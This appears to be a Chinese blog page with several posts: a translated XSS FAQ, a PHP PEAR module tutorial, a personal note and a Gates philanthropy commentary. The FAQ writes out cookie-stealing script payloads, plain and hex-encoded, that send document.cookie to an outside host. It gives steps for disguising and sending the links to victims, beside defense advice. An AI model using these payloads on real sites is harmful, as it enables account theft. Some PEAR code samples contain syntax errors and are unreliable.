Home

王者禁地-自己的生活自己主宰

跨站脚本攻击(XSS)FAQ

简介
现在的网站包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其所写成 XSS)的威胁,而静态站点则完全不受其影响。这篇FAQ将使你能更深入地理解这种威胁,并给出如何检测并防止的建议。

什么是跨站脚本攻击?
跨站脚本攻击(也称为XSS)指利用网站漏洞从用户那里恶意盗取信息。用户在浏览网站、使用即时通讯软件、甚至在阅读电子邮件时,通常会点击其中的链接。攻击者通过在链接中插入恶意代码,就能够盗取用户信息。攻击者通常会用十六进制(或其他编码方式)将链接编码,以免用户怀疑它的合法性。网站在接收到包含恶意代码的请求之后会产成一个包含恶意代码的页面,而这个页面看起来就像是那个网站应当生成的合法页面一样。许多流行的留言本和论坛程序允许用户发表包含HTML和javascript的帖子。假设用户甲发表了一篇包含恶意脚本的帖子,那么用户乙在浏览这篇帖子时,恶意脚本就会执行,盗取用户乙的session信息。有关攻击方法的详细情况将在下面阐述。

XSS和CSS是什么意思?
人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。因此有人将跨站脚本攻击缩写为XSS。如果你听到有人说 “我发现了一个XSS漏洞”,显然他是在说跨站脚本攻击。

跨站脚本攻击有什么危害?
为了搜集用户信息,攻击者通常会在有漏洞的程序中插入 JavaScript、VBScript、 ActiveX或Flash以欺骗用户(详见下文)。一旦得手,他们可以盗取用户帐户,修改用户设置,盗取/污染cookie,做虚假广告等。每天都有大量的XSS攻击的恶意代码出现。 Brett Moore的下面这篇文章详细地阐述了“拒绝服务攻击”以及用户仅仅阅读一篇文章就会受到的“自动攻击”。

http://archives.neohapsis.com/archives/vuln-dev/2002-q1/0311.html
几个跨站脚本攻击的例子?
著名的PHPnuke程序有很多XSS漏洞。由于该程序十分流行,因此经常被黑客们作为XSS的攻击对象进行检查。下面给出了几个已公开报告的攻击方法。

http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt
http://www.cgisecurity.com/archive/php/phpNuke_CSS_5_holes.txt
http://www.cgisecurity.com/archive/php/phpNuke_2_more_CSS_holes.txt

XSS cookie盗窃的意思
根据作为攻击对象的Web程序,下面某些变量和插入位置可能需要进行调整。要注意这只是攻击方法的一个例子。在这个例子中,我们将利用脚本“a.php”中的 “viriable”变量中的跨站脚本漏洞,通过正常请求进行攻击。这是跨站脚本攻击最常见的形式。

第一步: 锁定目标
当你找到某个Web程序存在XSS漏洞之后,检查一下它是否设置了cookie。如果在该网站的任何地方设置了cookie,那么就可以从用户那里盗取它。

第二步: 测试
不同的攻击方式将产生不同的XSS漏洞,所以应适当进行测试以使得输出结果看起来像是正常的。某些恶意脚本插入之后会破坏输出的页面。(为欺骗用户,输出结果非常重要,因此攻击者有必要调整攻击代码使输出看起来正常。)

下一步你需要在链接至包含XSS漏洞的页面的URL中插入 Javascript(或其他客户端脚本)。下面列出了一些经常用于测试XSS漏洞的链接。当用户点击这些链接时,用户的cookie奖被发送到 www.cgisecurity.com/cgi-bin/cookie.cgi 并被显示。如果你看到显示结果中包含了cookie信息,说明可能可以劫持该用户的账户。

盗取Cookie的Javascript示例。使用方法如下。

ASCII用法

 http://host/a.php?variable=”><script>document.location=’http://www.cgisecurity.com/cgi-bin/cookie.cgi? ‘%20+document.cookie</script>
十六进制用法

 http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f
%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67
%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f
%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
注意: 每种用法都先写为ASCII,再写成十六进制以便复制粘贴。

 1. “><script>document.location=’http://www.cgisecurity.com/cgi-bin/cookie.cgi?’ +document.cookie</script>
HEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e
%6c%6f%63%61%74%69%6f%6e%3d%27 %68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65
%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69 %2d%62%69%6e%2f
%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f %6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
2. <script>document.location=’http://www.cgisecurity.com/cgi-bin/cookie.cgi?’ +document.cookie</script>
HEX %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f
%63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72
%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b
%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c %2f%73%63%72%69%70%74%3e
3. ><script>document.location=’http://www.cgisecurity.com/cgi-bin/cookie.cgi?’ +document.cookie</script>
HEX %3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c
%6f%63%61%74%69%6f%6e%3d%27%68%74 %74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75
%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69 %6e%2f%63%6f%6f
%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65 %3c%2f%73%63%72%69%70%74%3e
第三步: 执行XSS
将做好的URL通过电子邮件或其他方式发送出去。注意如果你直接将URL发送给其他人(通过电子邮件、即时通讯软件或其他方式),你应当将其进行十六进制编码,因为这些URL一眼便可看出包含恶意代码,但经过十六进制编码之后就可以欺骗大部分人。

第四步: 处理收集到的信息
一旦用户点击了你的URL,相应数据就会被发送到你的CGI脚本中。这样你就获得了 cookie信息,然后你可以利用Websleuth之类的工具来检查是否能盗取那个账户。

在上面的例子中,我们仅仅将用户带到了 cookie.cgi页面上。如果你有时间,你可以在CGI中将用户重定向到原来的页面上,即可在用户不知不觉之中盗取信息。

某些电子邮件程序在打开附件时会自动执行附件中的Javascript代码。即使像Hotmail这样的大型网站也是如此,不过它对附件内容作了许多过滤以避免cookie被盗。

作为网站管理者应当如何防范?
这个问题很简单。坚决不要相信任何用户输入并过滤所有特殊字符。这样既可消灭绝大部分的XSS攻击。另一个建议是输出页面时将 < 和 > 变换成 < 和 >。要记住,XSS漏洞极具破坏性,一旦被利用,它会给你的事业带来极大的损害。攻击者会将这些漏洞公之于众,这会在用户隐私的问题上大大降低你的网站的用户信赖度。当然,仅仅将 ( 和 ) 变换成 < 和 > 是不够的,最好将 ( 和 ) 变换成 ( 和 ),# 和 & 变换成 # 和 &。

作为用户应当如何防范?
保护自己的最好方法就是仅点击你想访问的那个网站上的链接。例如,如果你访问了一个网站,该网站有一个链接指向了 CNN,那么不要单击该链接,而是访问 CNN 的主站点并使用搜索引擎查找相关内容。这样可以杜绝90%以上的XSS攻击。有时候XSS会在你打开电子邮件、打开附件、阅读留言板、阅读论坛时自动进行。当你打开电子邮件或是在公共论坛上阅读你不认识的人的帖子时一定要注意。最好的解决办法就是关闭浏览器的 Javascript 功能。在IE中可以将安全级别设置为最高,可以防止cookie被盗。

XSS漏洞有多常见?
由于XSS漏洞很容易在大型网站中发现,在黑客圈内它非常流行。FBI.gov、CNN.com、Time.com、Ebay、 Yahoo、Apple、Microsoft、Zdnet、Wired、Newsbytes都有这样那样的XSS漏洞。

在商业产品中,平均每个月能够发现10-25个XSS漏洞。

加密能否防止XSS攻击?
使用SSL(https)加密的网站并不比不加密的网站好到哪儿去。Web程序仍然以同样的方式工作,只是攻击是通过加密的连接实现。有些人看到浏览器上的锁图标就认为他们是安全的,其实不然。

XSS漏洞能否在服务器上执行命令?
XSS漏洞会导致Javascript的恶意插入,但它的执行受到很多限制。如果攻击者利用浏览器的漏洞,有可能在用户的计算机上执行命令。因此,就算能够执行命令也只能在客户端。简单地说,XSS漏洞可以触发客户端的其他漏洞。

如果我不修改CSS/XSS漏洞会怎样?
如果不修改XSS漏洞,你的网站上的用户会受到被篡改的威胁。许多大型网站都发现了XSS漏洞,这个问题已经得到普遍认识。如果不修改,发现它的人也许会警告你的公司,损害公司的信誉。你拒绝修改漏洞的消息也会传到客户那里,造成公司的信任危机。客户不信任的话还怎么做生意?

介绍一些更深入讲解XSS的地方。
“Cross-site scripting tears holes in Net security”
http://www.usatoday.com/life/cyber/tech/2001-08-31-hotmail-security-side.htm

Article on XSS holes
http://www.perl.com/pub/a/2002/02/20/css.html

“CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests”
http://www.cert.org/advisories/CA-2000-02.html

Paper on Removing Meta-characters from User Supplied Data in CGI Scripts.
http://www.cert.org/tech_tips/cgi_metacharacters.html

Paper on Microsoft’s Passport System
http://eyeonsecurity.net/papers/passporthijack.html

Paper on Cookie Theft
http://www.eccentrix.com/education/b0iler/tutorials/javascript.htm#cookies

The webappsec mailing list (Visit www.securityfocus for details)
webappsec@securityfocus.com

Many Thanks to David Endler for reviewing this document.

常用的PEAR::模块

一、命名约定
PEAR中的每个模块的相关文件是放在自己的分类目录下面,有的则是直接放在pear的根目录下面(单个文件)。由于PEAR没有象java那样的名字空间,所以你的类名应该能够体现你的模块名或者父类名之间的关系,守一定的约定,比如,你的模块名:"Mp3/common",那么,你的php文件应该位于:Mp3/common.php,你这个模块的类名应该是:Mp3_common。一般来说,如果你的模块是根据现有的某个模块改进而来的,那么建议把你的和现有的那个模块放在同一个目录下面。如果你设计的是一个新的类和模块,你可以自己建立一个新的目录,或者是按照相似的用途放在同样的目录下面。比如,你新编写了一个模块,用于处理日志的,建议你把它放在Log/下面,表示是用于Log处理的应用模块;如果新的模块是用于处理mp3的,那么你可以建立一个新的目录mp3,放在mp3目录下面。

二、PEAR模块
这里列举的是随着php4.05一起发布的pear中的模块,需要注意的是,一些抽象类或者是基类(如Mail.php,Log.php,Cache.php)没有列举出来,我们只是关注具有具体功能的模块。下面是这些模块的一个列表:

Benchmark/Timer 测试你的一段php代码的运行效率
Benchmark/Benchmark_Iterate 测试你某个函数循环执行时的性能
Cache/Output 可以将你的php脚本的输出进行缓存,可以使用多种方式缓存(存在文件,数据库或者是共享内存中),如果使用这个模块有可能增大服务器的负载,所以,如果你想通过动态脚本的缓存来提供效率,不妨使用Zend optimize,这个模块未必适合
Cache/Graphics 可以将你需要动态输出的图片进行缓存
Console/Getopt 命令行参数的处理模块
CMD 一个虚拟的shell,可以用它来运行一些系统的命令
Crypt/CBC 实现Perl Crypt::CBC 模块的仿真
Crypt/HCEMD5 实现Perl Crypt::HCE_MD5 模块的功能
Date/Calc 实现日期的相关操作
Date/Human Human历法的转换
DB 提供统一的、抽象的数据库操作层,后端支持多种数据库
File/Find 文件查找
File/Passwd 操纵password类的文件,如password,httppass,cvspassword
File/SearchReplace 在文件中查找替换字符串
HTML/Form 可以在html中快速地创建form
HTML/IT 实现模板定制,动态生成页面的功能,类似phplib中的模板功能,但是要简单易用
HTML/ITX 实现对IT的扩展功能,可以更加灵活地定制你的模板,实现更复杂的操作
HTML/Processor XML_Parser的扩展,使之可以应用于html文件的操作
HTTP/Compress 用于Php 输出缓冲机制的一个包装类,同时可以对缓冲的内容进行压缩存储
Image/Remote 无需把整个图片都下载到本地就可以获取远端系统的图片的信息,
Log/composite Horde对log抽象类做的一个扩展,可以使多个日志处理对象能够获得同一个日志事件。注意,Log目录下面的模块都是Horde项目的一部分,大部分都是抽象的超类
Log/file 将日志信息写入文件
Log/mcal 将信息发送到本地或远端的日程管理软件-mcal的数据库中
Log/observer Horder中Observer的一个超类
Log/sql 将日志信息发送到sql数据库中
Log/syslog 将信息发送到syslog中
Mail/RFC822 检查一个email地址是否是合法的rf822 email地址
Mail/sendmail 使用sendmail来发送信件
Mail/smtp 使用smtp服务器来发送信件
Math/Fraction 处理分形的数学计算
Math/Util 计算最大公约数
NET/Curl 对php的Curl扩展所作的面向对象的包装
NET/Dig 操纵dig,进行dns相关的查询操作
NET/SMTP 使用NET/Socket实现SMTP协议
NET/Socket 通用的Socket类,实现了常用的socket操作的包装
Numbers/Roman 阿拉伯数字和罗马数字的相互转换
Payment/Verisign 实现和Verisign支付网关的交互
Pear 提供Pear模块的2个基本类,PEAR 和PEARError类
PEAR/Installer pear的安装类,提供Perl中的CPAN模块类似的功能
PHPDoc 从php代码中自动生成API文档
Schedule/at 和Unix 上的AT守护进程进行交互
XML/Parser 基于php的xml扩展所作的xml的解析器
XML/Render 将xml文档生成其它的格式(html,pdf),这只是一个抽象类,在最新的pear cvs代码中已经有了html的实现
XML/RPC 用php实现xml-rpc的一个抽象类,在最新的pear cvs代码中已经有了xml/RPC/Server的实现

三、主要模块使用简介
现在我们将简单地介绍一些比较常用的,而且功能已经比较完善和稳定,可以用于“实战“模块,其中对于几个功能很强大的模块Db,phpdoc,XML_Parser,IT,ITX这里暂不介绍。

1.PEAR/Installer
这个模块属于pear本身的核心模块,它完成pear其它模块的安装和维护工作,类似perl中的cpan模块的功能,不过目前只有install功能,其它诸如查询,检查依赖性等等都没有完成,pear本身也没有类似 cpan 那样的开放的站点,不过随着参与pear的开发人员的不断增加,一切都会有的。

使用语法:

PLAIN TEXT
PHP:
  1. PEAR_Installer::installer($file)

$file是需要安装的模块文件,可以是本地文件,也可以是远程的文件,如http://或者是ftp,installer会自动下载到本地。文件一般使用gzip打包,其中要包括一个package.xml文件,用于描述你的这个模块的相关信息,如包含的文件,相互依赖性等,此外当然要包括你的模块的php文件。pacakage.xml的DTD文件在pear目录下面,名字是package.dtd.

PLAIN TEXT
PHP:
  1. <?php
  2. require_once "PEAR/Installer.php";
  3. $installer = new PEAR_Installer;
  4. //安装指定的模块
  5. $result = $installer->install($package_file);
  6. if ( PEAR::isError($result)){
  7. echo "Install $package_file failed!";
  8. }else {
  9. echo "Install $package_file sucess!";
  10. }
  11. ?>

2.CMD
虽然大多数的php应用很少调用系统命令,因为这些应用都是基于web的,从运行效率和系统的负载考虑,都要避免直接调用系统命令,不过,在有些特殊的应用或者是你愿意把php作为一个shell工具的时候,调用现有的系统工具就是不可避免的了。CMD可以让你很方便地执行一系列的系统命令。

使用语法:

PLAIN TEXT
PHP:
  1. setOption ($option, $setting)

设置参数$options为$setting

    $options是一个常量,它可以是以下值:

  1. CMD_SHUTDOWN : 通过shutdown函数来执行命令
  2. CMD_SHELL : 指定shell的路径
  3. CMD_OUTPUT : 是否屏蔽命令的标准输出
  4. CMD_NOHUP : 使用nohup后台执行命令
  5. CMD_VERBOSE : 将错误打印到标准输出

command($command)
添加需要执行的命令,$command可以是数组或普通的字符串

exec()
执行已经添加的命令

PLAIN TEXT
PHP:
  1. <?php
  2.    require_once "CMD.php";
  3.    $cmd = new CMD;
  4.    $cmd->command('tar zcvf test.tar.gz ~/test');
  5.    if ( $cmd->exec() ) {
  6.        echo "success!\n";
  7.    } esle {
  8.        echo "Error:" . $cmd->lastError;
  9.    }
  10. ?>

3.Benchmark/Timer和Benchmark/Iterate
这2个模块可以让你测试你的代码的运行效率如何,我认为这对于系统调试很有用:你可以尝试不同的算法,仔细考察每种算法需要运行的时间,然后选择最佳的方式。Benchmark/Timer测试运行中在2个不同的时间点的时间差,Benchmark/Iterate则是对Timer扩展,测试运行某段代码(函数)n次所需要的时间。

使用语法:

Benchmark/Timer

Timer::setMarker($name) 设置当前时间点为$name
Timer::start() 开始测试
Timer::stop() 停止测试
Timer::timeElapsed($start = 'Start', $end = 'Stop') 计算$start和$end 这2个时间点的时间差
Timer::getProfiling() 返回start 和 stop 之间所耗用的时间
PLAIN TEXT
PHP:
  1. <?php
  2.      require_once "Benchmark/Timer.php";
  3.      $timer = new Benchmark_Timer;
  4.  
  5.      $timer->start();
  6.      $timer->setMarker('Marker 1');
  7.      $timer->stop();
  8.  
  9.      $profiling = $timer->getProfiling();
  10. ?>

Benchmark/Iterate

Iterate::run()
循环运行指定的函数。这是一个具有可变参数的方法,第一个参数是要循环的次数,第2个参数是要执行的函数,第3个参数起则是要传递给测试函数的参数。

Iterate::get()
返回测试所用的时间

PLAIN TEXT
PHP:
  1. <span style="font-family: Courier New;"><?php
  2.      require_once "Benchmark/Iterate.php";
  3.      $benchmark = new Benchmark_Iterate;
  4.      function foo($string) {
  5.           print $string."";
  6.      }
  7.      $benchmark->run(100, 'foo', 'test');
  8.      $result = $benchmark->get();
  9. ?>

3.File/Find
&glob ($pattern, $dirpath, $pattern_type='php')
在$dirpath中搜索符合$pattern的目录和文件,返回匹配的文件和目录名数组

&search ($pattern, $directory, $type='php')
在$directory中搜索符合$pattern规则的文件,返回匹配的文件名数组(注意,只是文件,不包括子目录)。$pattern是要指定的搜索条件,一般是规则表达式,$patten_type指定使用什么模式的规则表达式,缺省是php模式,你也可以指定"perl"来使用perl模式的规则表达式
提示:search和glob不同的是,glob并不递归搜索子目录,而search则递归搜索子目录。

PLAIN TEXT
PHP:
  1. <?php
  2.     require_once "File/Find.php";
  3.     $find = new File_Find;
  4.     //搜索当前目录
  5.     $php_files = $find->glob("*php",".");
  6.     if ( PEAR::isError( $php_files ) ){
  7.         die "错误:" . $php_files->getMessage() ."\n" ;
  8.     }
  9.     //递归搜索当前目录
  10.     $all_php_files = $find->search("*php",".");
  11.     if ( PEAR::isError( $all_php_files ) ){
  12.         die "错误:" . $php_files->getMessage() ."\n" ;
  13.     }
  14. ?>

4.File/Passwd
操纵password格式的文件,类似如标准的unix password,apache 的.htppass,cvs的pserver password文件。从现有版本的代码来看,它还不能真正地用来维护这些passwd文件(比如并不支持shadow)。不过你可以用来创建类似的密码文件,当然,安全性不会很高。

使用方法:
File_Passwd($file,$lock=0)----------创建对象,$file是你要操作的passwd文件,$lock指定是否要用flock对文件上锁。
addUser($user,$pass,$cvsuser)----------增加一个用户,$user,$pass分别是用户名和密码,$cvsuser是cvs 用户的id
modUser($user,$pass,$cvsuser)----------修改$user的密码为$pass,$cvsuser是cvs 用户的id
delUser($user)----------删除指定的用户$user
verifyPassword($user,$pass)----------检验用户密码
close()----------保存刚才的修改到password文件,关闭password文件,对文件解锁。
5.File/SearchReplace
在文件中查找和替换字符串
使用方法:

PLAIN TEXT
PHP:
  1. File_SearchReplace($find, $replace, $files, $directories = ', $include_subdir = 1, $ignore_lines = array())

生成并设置对象

$find
要查找的字符串,可以是字符串或规则表达式

$replace
要替换成的字符串,可以是字符串或规则表达式

$files
指定在哪些文件中进行替换操作,数组或者是以","分割的一个字符串

$directories
指定在那个目录中操作,可选,数组或者是以","分割的一个字符串

$include_subdir
如果是在目录中操作,指定是否在子目录中递归执行上述操作,可以是数值1或0。

$ignore_lines
指定要忽略的文件行,这是一个数组,任何以这个数组中任意一个字符串开始的文件行,都会忽略。

getNumOccurences()
返回已经执行了查找替换的次数

getLastError()
返回上一次的错误信息
setFind($find)
设置要查找的字符串
setReplace($replace)
设置要替换的字符串
setFiles($files)
设置要执行替换操作的文件

setDirectories($directories)
设置要替换操作的目录

setIncludeSubdir($include_subdir)
设置是否在子目录中也执行查找替换

setIgnoreLines($ignore_lines)
设置要忽略的行,只能在使用"normal"搜索函数的时候使用

setSearchFunction($search_function)
设置要使用的搜索函数,可以是下列参数:

normal 缺省值,使用file函数读入文件内容,然后使用str_replace逐行的进行替换。
quick 使用str_replace直接对整个文件进行替换
preg 使用preg_replace()来进行替换,你可以使用符合这个函数要求的规则表达式
ereg 使用ereg_replace()来进行替换,你可以使用符合这个函数要求的规则表达式

doSearch()
执行查找替换操作

PLAIN TEXT
PHP:
  1. <?php
  2.     require_once "File/SearchReplace.php";
  3.     require_once "File/Find";
  4.  
  5.     //递归搜索当前目录
  6.     $find = new File_Find;
  7.     $all_php_files = $find->search("*php",".");
  8.     if ( PEAR::isError( $all_php_files ) ){
  9.         die "错误:" . $php_files->getMessage() ."\n" ;
  10.     }
  11.     if ( !count($all_php_file) ){
  12.         die "NO php source files found!\n";
  13.     }
  14.     //将<?的php标志修正成<?php,以符合pear标准
  15.     $replace = new File_SearchReplace('<? ','<?php ',$all_php_files);
  16.     $replace->doSearch();
  17.     if ( $replace->getLastError() ) {
  18.        die "发生错误:" . $replace->getLastError() ;
  19.     } else {
  20.        echo "共成功替换了 " . $replace->getNumOccurences() . " 处。\n";
  21.     }
  22. ?>

6.HTML/Form
这个模块可以让你快速地生成一个提交的窗体,而无需重新去编写html代码

使用方法:

PLAIN TEXT
PHP:
  1. Form::HTML_Form($action, $method = 'GET', $name = ', $target = ')

这个类的构造函数带有一些参数,这些参数和通常要编写html代码中的form参数是基本一致的,$action是在form中要提交到的URL,$name可以指定form的名字,$target指定是否要新开窗口等等。

下面的addXXX系列方法,用于在这个form中添加相应的控件,控件的属性和html中的也相一致。
addText($name, $title, $default, $size = HTML_FORM_TEXT_SIZE)
addCheckbox($name, $title, $default)
addTextarea($name, $title, $default,$width = HTML_FORM_TEXTAREA_WT,$height = HTML_FORM_TEXTAREA_HT)
addPassword($name, $title, $default, $size = HTML_FORM_PASSWD_SIZE)
addSubmit($name = "submit", $title = "Submit Changes")
addReset($title = "Discard Changes")
addSelect($name, $title, $entries, $default = ', $size = 1,$blank = ', $multiple = false, $attribs = ')
addRadio($name, $title, $value, $default)
addImage($name, $src)
addHidden($name, $value)

Display()
显示这个窗体

PLAIN TEXT
PHP:
  1. <?php
  2.     require_once "HTML/Form.php";
  3.     //创建并显示登录窗体
  4.     $myform = new HTML_Form("./login.php");
  5.     $myform->addText('username','用户名',');
  6.     $myform->addPasswd('passwd','登录密码',20);
  7.     $myform->addHidden('retry','1');
  8.     $myform->addSumit('login','登录');
  9.     $myform->Display();
  10. ?>

7.Mail/RFC822
检查一个输入的email是否合法,不是一件很轻松的事情,你也许尝试使用一些规则表达式来检查,但是并非那么方便有效。现在,如果要检查一系列的邮件地址是否符合RFC822标准,并把它们拆分成单独的email地址,你可以试试这个模块,非常简单实用。

使用方法:

PLAIN TEXT
PHP:
  1. Mail_RFC822($address = null, $default_domain = null, $nest_groups = null, $validate = null)

类构造函数,$address是你要验证的一系列的地址,$default_domain,指定缺省的域名或者主机名,$nest_groups 是否在输出结果中进行分组,以便显示$validate 是否需要验证每个原子parseAddressList($address = null, $default_domain = null, $nest_groups = null, $validate = null)分析验证所给定的地址列表,如果地址有效,返回拆分后的单独的地址列表,如果发生错误,则返回错误信息。

PLAIN TEXT
PHP:
  1. <?php
  2.     require_once "Mail/RFC822.php";
  3.     $rf822 = new Mail_RFC822;
  4.     $result=$rf822->paseAddressList('who;whoim@hotmail.com;test@test.ch');
  5.     if ( $rf822->error ){
  6.         echo "Error:$result";
  7.     }else {
  8.         reset($result);
  9.         for ($i=0; $i <count($result);$i++){
  10.             echo "email:$result[$i]\n";
  11.         }
  12.     }
  13. ?>

8.Mail/Sendmail
sendmail是unix/linux上面最常用的MTA,这个模块可以让你直接使用sendmail来发送信件

使用方法:

PLAIN TEXT
PHP:
  1. Mail_sendmail($params)

类构造函数,$params是一个关联数组,你可以设定sendmail的参数,目前只有'sendmail_path'是有效的,用来设置sendmail的路径 send($recipients, $headers, $body) 发送信件,$recipients是你的收件人的email地址,可以是单个,也可以是用;隔开的地址列表,只要符合RFC82标准就可以。$headers是你发送信件的信头,这是一个关联数租,数组的关键字是信头的名字(如Subject),数组值则是信头的值(比如:Hello!)。处理后的信头将会是:Subject:Hello! $body 是信件的信体,包括所有的MIME编码后的部分。如果成功,返回真,否则返回一个PEAR_Error对象

PLAIN TEXT
PHP:
  1. <?php
  2. require_once "Mail/sendmail.php";
  3. $sendmail = new Mail_sendmail(array('sendmail_path=>'/usr/local/bin/sendmail'));
  4. $header = array('Subject'=>'Hello','BCC'=>'test2@hotmail.com');
  5. $body = 'This is a test message from nightsailer.com';
  6. $result = $sendmail->send(<a href="mailto:'test@nightsailer.com'">'test@nightsailer.com'</a>, $header, $body);
  7. if ( PEAR::isError($result) ){
  8. echo "<h1>发送失败 </h1><br>原因:".$result->getMessage()."<br>";
  9. }else {
  10. echo "<h1>恭喜!发送成功!</h1><br>";
  11. }
  12. ?>

9.Mail/smtp
对于现在有些站点不允许使用sendmail,那么如果你的php程序希望使用发信功能,就需要能够通过使用外部的smtp服务器来完成相应的功能了。

使用方法:使用上这个模块和Mail::sendmail基本上是一样的。需要注意的是:这个模块需要使用Net::SMTP模块:Mail_smtp($params)
$params的有效参数是:
'host' smtp的服务器地址,缺省是 localhost
'port' smtp服务端口,缺省是25
'auth' smtp是否需要授权验证,缺省是false
'usename' smtp授权的用户名
'password' smtp授权的密码

send($recipients, $headers, $body)
发送

PLAIN TEXT
PHP:
  1. <?php
  2. require_once "Mail/sendmail.php";
  3. $params=array('host'=>'smtp.nightsailer.com','auth'=true,
  4. 'username'=>'night','password'=>'123456');
  5. $sendmail = new Mail_sendmail($params);
  6. $header = array('Subject'=>'Hello','BCC'=>'test2@hotmail.com');
  7. $body = 'This is a test message from nightsailer.com';
  8. $result = $sendmail->send(<a href="mailto:'test@nightsailer.com'">'test@nightsailer.com'</a>, $header, $body);
  9. if ( PEAR::isError($result) ){
  10. echo "<h1>发送失败 </h1><br>原因:".$result->getMessage()."<br>";
  11. }else {
  12. echo "<h1>恭喜!发送成功!</h1><br>";
  13. }
  14. ?>

10.Schedule/At
这个模块提供了unix上面的at程序的接口

add($cmd, $timespec, $queue = false, $mail = false )
追加一个at命令

这个方法将为at程序生成一个定制的作业:
$cmd 是你要运行的程序或脚本
$timespec 是作业开始执行的时间,格式与at要求的相同
$queue 可选参数,指明作业的队列名
$mail 可选参数,指明是否在作业结束后要发送email汇报运行结果

show($queue = false)
显示在at队列中的命令,返回一个关联数组,数组的key是作业的编号,相应的键值也是一个关联数组,内容是array(runtime,queue)$queue是一个可选参数,你可以用它限定只返回队列中队列名匹配$queue的作业列表

remove($job = false)
从at队列中删除指定的at作业$job是要删除的作业编号,如果,成功,返回true,否则返回false

PLAIN TEXT
PHP:
  1. <?php
  2. require_once "Schedule/At.php";
  3. $at = new Schedule_At();
  4. //生成并追加一个作业
  5. $result = $at->add ('find / -type file -name core -exec rm -f {} \;','00:00');
  6. if ( PEAR::is_Error($result) ) {
  7. echo "无法追加作业!\n";
  8. echo "原因:$result->getMessage() \n";
  10. }
  11. //显示当前at队列
  12. $queue = $at->show();
  13. if ( PEAR::isError($queue) ) {
  14. echo "发生错误!\n";
  15. echo "原因:" . queue->getMessage(). "\n";
  17. }
  18. reset( $queue );
  19. while ( list($job, $cmd) = each $queue ){
  20. echo "[$job]" . $cmd['runtime'] . "-" .$cmd['queue']
  21. echo "\n"
  22. }
  23. ?>

五、作者简介
潘凡(Night Sailer):北京赛迪数据有限公司工程师。主要从事是数据的分析和转换,以及相关的开发工作。擅长使用VB,PERL,PHP进行开发以及Linux的中文化工作。近期兴趣是Perl,Php与XML的应用,PHP的MVC开发模式,PERL-GTK的使用。您可以通过 E-mail:nightsailer@hotmail.com 跟他联系。

长夜漫漫 无心睡眠

本想睡觉了,最近总是近一点了才睡的,也可能是最近在公司呆的不爽吧,而且简历一直都没投但一直都有公司在勾引偶,想想,还是……

外头这开始下雨,很凉快,怎么说在北京也呆五年了,今年算是雨下最最最多的一年,很happy,要是把时间拿来睡觉实在是太浪费。

于是乎就找了一款代码高亮插件玩玩吧。以下原文地址是:http://www.21andy.com/blog/20070111/516.html

CooCode.cn的作品coolcode3.3

用法:

<code lang="php" linenum="off" download="21andy.php">
......
你的代码
......
</code>

说明:

linenum="off" 表示不显示行号
download="21andy.php" 表示你的代码将可以以21andy.php文件来下载

安装:只需要把解压后的目录coolcode目录直接放到wp-content/plugins/目录下,在后台激活即可 

下载:CoolCode3.3 21Andy.com修正版

比尔-盖茨580亿美元全捐做慈善

    微软创办人盖茨决定52岁就引退,下周五将不再做微软执行主席,只出任非执行主席。在接受访问时盖茨表示,将把自己580亿美元财产全数捐给名下慈善基金比尔及梅琳达盖茨基金会,一分一毫也不会留给自己子女。他说:“我和妻子希望以最能够产生正面影响的方法回馈社会。”
   
    不久前,内地富豪还在为抗震救灾到底该捐款多少而斤斤计较,现在,盖茨用自己的言行为他们好好地上了一堂财富课。这位曾经的世界首富不但捐出了全部财产,而且传递出“以最能够产生正面影响的方法回馈社会”的慈善理念。这种财富观,这种慈善意识,足以让内地富豪们汗颜。
   
    “在巨富中死去,是一种耻辱。”
   
    备受推崇的富豪、慈善家卡内基是这样看待财富的。在其后,一个接一个的富豪为美国社会形成了“取之社会、用之社会”的慈善传统。反观我们的富豪,更多的是以代际转移的方式继承财富,遗产税的缺失,让他们毫无顾忌地把财富一代接一代地留与子女享用,却很少考虑捐赠,以慈善的方式回馈社会。
   
    我们的富豪之所以对慈善不热衷不感冒,不是因为富豪的数量少,2007年胡润百富榜显示,中国财产超过10亿美元的富豪人数已超过了德国,仅次于美国,跃居全球第二。虽然这个数字统计并不权威,但中国富豪越来越多是不争事实。可是由于慈善文化的不成熟,由于慈善机构的不发达,由于慈善配套性制度的不完善,庞大的富豪群体根本没有形成“以最能够产生正面影响的方法回馈社会”的慈善认知,而这才是我们的富豪与盖茨等世界富豪的最大差距所在。
   
